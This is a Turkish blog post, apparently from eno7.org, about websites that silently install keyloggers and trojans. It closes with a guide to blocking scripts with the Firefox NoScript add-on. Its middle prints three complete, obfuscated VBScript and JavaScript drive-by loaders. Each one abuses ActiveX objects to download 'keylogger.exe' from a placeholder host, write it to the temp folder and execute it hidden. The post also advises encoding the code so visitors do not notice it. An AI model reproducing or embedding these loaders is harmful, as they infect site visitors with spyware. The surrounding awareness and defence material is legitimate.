Eminim internette dolaşan birçok internet kullanıcısı birazdan anlatcağım durumlardan müzdarip olmuşlardır. Olay sonrası yaşanan konuşmalar genelde şöyledir: - Dün bana bir mail geldi, gönderdikleri sayfaya girmemi istediler, siteye girdikten sonra birdaha mailime giremedim. Bir diğer örnek: Bir foruma girdim, birisi yasaklanmış youtube sitesine nasıl girileceği hakkında bir site adresi verdi fakat siteye girdikten sonra msn'ime giremedim. Hatta mağdur olan kişilerde şu şekil konuşmalar da mevcuttur:

Birisi siteme yorum yapmış ve yorumda sitem hakkında yazıların yazıldığı bir site adresi vermiş o siteye girdikten 10 dk sonra sonra sitemin hacklendiğini gördüm. Bu gibi durumlarda bazen verilen siteye girilmesine bile gerek kalmadan yorum formuna gömülmüş script kodları sayesinde hedef sitenin cookie bilgileri çalınabilir.

Gördüğünüz gibi internette önlem alınmadan dolaşıldığı zaman başımıza gelebilecek tehlikelerin sonu yok. Antivirüsünüzün olması veya spyware programlarınızın olması bu gibi saldırılardan korunmanıza yardımcı olamıyor. Üstte anlattığım yöntemler genelde kurbanın cookie bilgilerinin çalınmasına yönelik durumlar. Yani XSS açığı bulunan sitelerden yararlanılarak (bu sizin sitenizde olabilir) o sitede kayıtlı oturum bilgilerinizin çalınması.

Fakat tehlike sadece bununla sınırlı değil, ziyaret ettiğiniz websitelerinden sizin haberiniz dışında bilgisayarınıza yüklenebilecek olan keyloggeri & trojan türevi zararlı dosyalar ve bu dosyalar sayesinde bilgisayarınızı tamamen size saldırıyı yapan kişinin emrine verebilecek büyük tehlikeler de mevcut. Bu gibi dosyaları genelde ziyaret ettiğiniz sitenin kaynağına gömdükleri script ve frame tarzı kodlar sayesinde size enjekte ederek kullandıkları yöntemdir.

Siz o sırada sitede farklı şeyler görürken arka planda bu zararlı dosyalar bilgisayarınıza habersizce yükleniyor ve sonrası bu saldırıyı yapan kişiye kalıyor. Bu kodları genelde encode ederek yani şifreleyerek sitenin kaynak koduna gömüyorlar. Aşağıda örnek amaçlı bazı kodlar paylaşıcam bu kodlar sayesinde ziyaretçilerin bilgisayarlarına keylogger & trojan tarzı dosyalar yüklemek mümkün olabiliyor... Bu tarz kodlardan bazıları sadece internet explorerda çalışırken bazıları hem internet explorerda hem de firefoxda çalışabiliyor.

Önce bu tarz saldırıların nasıl yapıldığını görelim sonra nasıl korunacağımızı öğrenelim. Saldırının nasıl yapıldığını bilirsek, ne tür bir önlem almamız gerektiğini de bilmiş oluruz.

Aşağıda bir web sitenin kaynak koduna gömülmüş, zararlı kodlar mevcut bu kodlarla ziyaretçilerin bilgisayarlarına zararlı dosyalar yüklemek mümkün olabiliyor.

ÖRNEK 1:

CODE:

1. <HTML>

2. <HEAD>

3. <META http-eqiv="content-type" content="text/html;charset=gb2312">

5. <textarea style="display:none" id=lshdic200Xpage rows="1" cols="20"></textarea><script language=vbs>document.write(strreverse(lshdic200Xpage.value))</script>

6. <script

8. language="VBScript">

9.   on error resume next

10.   xx="object"

11.   xxx="classid"

12.   xxxx="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

13.   xxxxx="Microsoft.XMLHTTP"

14.   xxxxxx="GET"

15.   xxxxxxx="Scripting.FileSystemObject"

16.   xxxxxxxx="Shell.Application"

17.   dl = "http://www.site.com/keylogger.exe"

18.   Set df = document.createElement(xx)

19.   df.setAttribute xxx, xxxx

20.   str=xxxxx

21.   Set a = df.CreateObject(str,"")

22.   a1="Ado"

23.   a2="db."

24.   a3="Str"

25.   a4="eam"

26.   str1=a1&a2&a3&a4

27.   str5=str1

28.   set S = df.createobject(str5,"")

29.   S.type = 1

30.   str6=xxxxxx

31.   a.Open str6, dl, 0

32.   a.Send

33.   fname1="keylogger.exe"

34.   set F = df.createobject(xxxxxxx,"")

35.   set tmp = F.GetSpecialFolder(2)

36.   fname1= F.BuildPath(tmp,fname1)

37.   S.open

38.   S.write a.responseBody

39.   S.savetofile fname1,2

40.   S.close

41.   set Q = df.createobject(xxxxxxxx,"")

42.   str1=a1&a2&a3&a4

43.   Q.ShellExecute fname1,"","","open",0

44.   </script>

45. <script type="text/jscript">

46. function init() {

47. document.write(Date());

49. }

50. window.onload = init;

51. </script>

52. </HEAD>

53. </BODY>

54. </HTML>

ÖRNEK 2:

CODE:

1. <script type="text/javascript" language="javascript">

4. var iss = false;

5. var uri = 'http://www.site.com/keylogger.exe';

7. var za = 'ting.FileS';

8. var z = 'plication';

9. var shellapp = 'Shell.Ap'+z;

10. var z01 = "r%20%3D%20o.Creat'+'eObject%'+'28n%29";

11. var z02 = "r%20%3D%20o.Creat'+'eObject%28n%'+'2C%20%22%22%29";

12. var z03 = "r%20%3D%20o.Create'+'Object%28n%2C'+'%20%22%22%2C%20%22%22%29";

13. var z04 = "r%20%3D%20o.GetOb'+'ject%28%'+'22%22%2C%20n%29";

14. var z05 = "r%20%3D%20o.GetObject%28n%'+'2C%20%22%22%29";

15. var z06 = "r%20%3D%2'+'0o.GetObject%28n%29";

17. var a1 = 'ADO';

18. var a2 = 'DB.';

19. var a3 = 'Str';

20. var a4 = 'eam';

22. var obj_t = new Array(

23.   'BD96'+'C556-65A'+'3-11D0-983'+'A-00C0'+'4FC29E36',

24.   'AB9BCED'+'D-EC'+'7E-47E1-9322-D'+'4A210617116',

25.   '0006F'+'033-0000-0000-C000-00000'+'0000046',

26.   '0006F03A-0000-00'+'00-C000-000000000046',

27.   '6e32070a-766d-4ee6-879c-dc1'+'fa91d2fc3',

28.   '6414512B-B978-451D-A0D8-F'+'CFDF33E833C',

29.   '7F5B7'+'F63-F06F-43'+'31-8A'+'26-339'+'E03C0AE3D',

30.   '06723E09-F4'+'C2-43c8-8358-09F'+'CD1DB0766',

31.   '639F725F-1B2'+'D-4831-A9FD-8748'+'47682'+'010',

32.   'BA018'+'599-1DB3-44f9-83B4-461454C8'+'4BF8',

33.   'D0C07D56'+'-7C'+'69-43'+'F1-B4A0-25'+'F5A11FAB19',

34.   'E8CCCDDF-C'+'A28-496b-B050-6C'+'07C962476B');

36. function CreateO(o, n) {

37.   var r = null; 

38.   var ko1 = 'etObject(n)';

39.   var ko3 = 'teObject(n)';

40.   var ko4 = 'o.Create';

41.   var ko5 = 'bject("", n';

42.   var ko6 = 'reateObj';

43.   var ko7 = 'r = o.Ge';

45.   try { eval('r = o.Crea'+ko3) }catch(e){} 

46.   if (! r) {

47.     try { eval('r = '+ko4+'Object(n, "")') }catch(e){}

48.   } 

49.   if (! r) {

50.     try { eval('r = o.C'+ko6+'ect(n, "", "")') }catch(e){}

51.   }

52.   if (! r) {

53.     try { eval('r = o.GetO'+ko5+')') }catch(e){}

54.   } 

55.   if (! r) {

56.     try { eval(ko7+'tObject(n, "")') }catch(e){}

57.   } 

58.   if (! r) {

59.     try { eval('r = o.G'+ko1) }catch(e){}

60.   }

61.   return(r); 

62. }

64. function iii() {

65.   return true;

66. }

69. window.onerror = iii;

72. function rname() {

73.   var chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz";

74.   var string_length = 8;

75.   var randomstring = '';

76.   for (var i=0; i<string_length; i++) { var rnum = Math.floor(Math.random() * chars.length); randomstring += chars.substring(rnum,rnum+1);

77.   } return randomstring + '.exe';

78. } function DoIt()

79. {

81.   x.Open('GET',uri + '?e=' + escape(rname()),false);

82.   x.Send(); var fname1 = rname(); var f = xml.CreateObject('Scrip'+za+'ystemObject',''); var tmp = f.GetSpecialFolder(2);

85.   fname1 = f.BuildPath(tmp,fname1);

87.   S.open();

88.   S.write(x.responseBody);

89.   S.savetofile(fname1,2);

90.   S.close(); var Q = xml.createobject(shellapp,'');

92.   Q.ShellExecute(fname1,'','','open',0);

93. } if (window.ActiveXObject) { var ni = 0; while (obj_t[ni]) { var xml = null; var xml = document.createElement('object'); guid = obj_t[ni];

94.    

95.     xml.setAttribute('classid','clsid:'+guid); if (xml) {

96.       n_xml = 'Microsoft.XMLHTTP'; try { var x = null; var x = CreateO(xml,n_xml); if (x) {

97.          

98.           str1 = a1 + a2;

99.           str1 = str1 + a3 + a4;

100.           str5 = str1; var S = xml.CreateObject(str5,"");

101.           S.type = 1;

102.           str6 = 'GET';

103.           DoIt();

104.         }

106.       } catch(e){}

107.     }

109.     ni++;

110.   }

111. }

112. </script>

114. <script>

115. <!--

116. try {

117.  function f(b, a, c) { return a + b + c; }

118.  function g(b, a) { return a + b; }

119. var s = new Array

120. (

121.  "",

122.  "keylogger.exe",

123.  "http://www.site.com/",

124.  "object",

125.  "classid",

126.  f("0C0", g(f(g("3-11D0-9", "56-65A"), "id:BD96C5", "83A-0"), "cls"), g("9E36", "4FC2")),

127.  g(f("ft.XMLH", "oso", "TTP"), "Micr"),

128.  f("E", "G", "T"),

129.  f(g(".Str", "odb"), "Ad", "eam"),

130.  f(g(".She", "ipt"), "WScr", "ll"),

131.  "PROCESS",

132.  "TMP",

133.  "/[^/]*$",

134.  "/",

135.  "\\"

136. );

137. a = document.createElement(s[3]);

138. a.setAttribute(s[4], s[5]);

139. with(a.CreateObject(s[6], s[0]))

140. {

141.  open(s[7], location.href.replace(new RegExp(s[12]), s[13] + s[1]), false);

142.  send();

143.  if(status <400)

144.   with(a.CreateObject(s[8], s[0]))

145.   {

146.    Type = 1;

147.    Open();

148.    Write(responseBody);

149.    with(a.CreateObject(s[9], s[0]))

150.    {

151.     c = Environment(s[10])(s[11]) + s[14] + s[1];

152.     SaveToFile(c, 2);

153.     Exec(c);

154.    }

155.   }

156. }

157. } catch (e) {}

158. // -->

159. </script>

Üstte paylaştığım kodları genelde encode ederek kullanıyorlar ki ziyaretçiler olası bir şüphe içine girmesinler diye. Üstteki kodu sitemin "Character Encoding" (http://www.eno7.org/character-encoding/encode.html) bölümüne girerek encode edebilirsiniz hatta encode edilmiş kodları tekrardan şifreleyip kullanmak dahi mümkün bunun amacı ise kodların kolay decode edilmesinin önüne geçmektir.

Üstteki kodları genelde kaynak koduna bu şekilde şifreleyerek saklarlar bazen kaynak kodunda bunlarla ilgili hiçbirşey görünmez.

CODE:

1. <script language='javascript'> document.write(unescape('%20%20%78%78%78%78%78%78%78%3D'));</script>

Kodları incelerseniz bu kodları script kodları sayesinde enjekte etmeye çalıştıklarını görebilirsiniz. Bu gibi saldırıların önüne geçmek için önce gerekli olan malzemeleri sıralayalım.

1:) Mozilla Firefox (http://www.mozilla-europe.org/tr/products/firefox/)
2:) Firefox NoScript Eklentisi (https://addons.mozilla.org/tr/firefox/addon/722)

Firefox'u kurduktan sonra Türkçe dil desteği olan NoScript eklentimizi kuruyoruz ve firefoxu tamamen kapatıp tekrar açıyoruz.

Firefox'umuzun sağ alt köşesine eklentimizin logosu geliyor

Herhangi bir siteye girdiğimizde bu eklenti sitede bulunan tüm script kodlarını ve flash dosyalarını engelliyor çünkü flash dosyaları ile de saldırı yapılması mümkündür önceki "XSS nedir" yazımda bu konudan da bahsetmiştim.

Eklentimizi kurduk ve bir siteye girdik hemen browserımızın alt köşesinde kaç tane script kodunun ve flash dosyasının engellendiğini gösterir.

Eğer o siteye güveniyorsak site üzerinde sağ click yaparak veya sağ alt köşedeki noscript logosuna tıklayarak güvendiğimiz site için izin verebiliriz böylelikle o site üzerinde çalışan script kodlarına ve flash dosyalarına izin vermiş oluruz. Eğer site içinde başka sitelerden çağrılmış scirpt kodlarıda mevcut ise onlara da ayriyetten izin vermemiz gerekiyor resimde ip2phrase.com sitesinin de yasaklı olduğunu görüyorsunuz ona da ayrıyetten izin vermeliyim. Tabiki bunu sadece güvendiğimiz siteler için yapıyoruz.

Eğer siteye sonradan güvenimiz kalmazsa siteyi tekrar yasaklı listemize ekleyebiliriz. Siteye izin verdiğimiz yoldan aynı şekilde yasaklamamız da mümkün.

Şimdi eklentimizin menülerini inceleyelim noscript logosuna tıklayarak seçeneklere giriyoruz.

Burada izin verdiğimiz siteleri görebiliriz, istersek daha fazla siteyi de buradan beyaz listeye ekleyebiliriz, yasaklamak istediklerimizi ise listeden çıkarabiliriz.

Eklentiler sekmesine tıkladığımızda karşımıza eklentinin sitelerde uyguladığı kısıtlamaları görüyoruz burada daha güvenli bir surf yapmak istersek "< IFRAME > 'i engelle" seçeneğini de seçerek siteler için ilave kısıtlama yapabiliriz.

Uyarılar sekmesine tıkladığımıza, girdiğimiz sitelerde engellenen betiklerin uyarı olarak browserın altında gösterilip gösterilmemesi veya gösterilen uyarının belli bir saniye sonra kaybolmasını sağlayabiliriz. Bunun için "5 saniye sonra gizle" seçeneğini seçebiliriz istersek saniyeyi uzatabiliriz.

Bu eklentinin kullanımı bize sitelerden enjekte edilmeye çalışılan tüm zararlı kodlardan kurtulmamızı sağlar.

Eğer daha önce bu gibi sitelere girip keylogger yediğinizi düşünüyorsanız ve şifrelerinizin, yazılarınızın başkaları tarafından kayıt edildiğini düşünüyorsanız "Tüm Keyloggerlar’dan Korunun" başlıklı yazdığım yazıya bakabilirsiniz.

Kaynak: eno7 | http://eno7.org

__________________________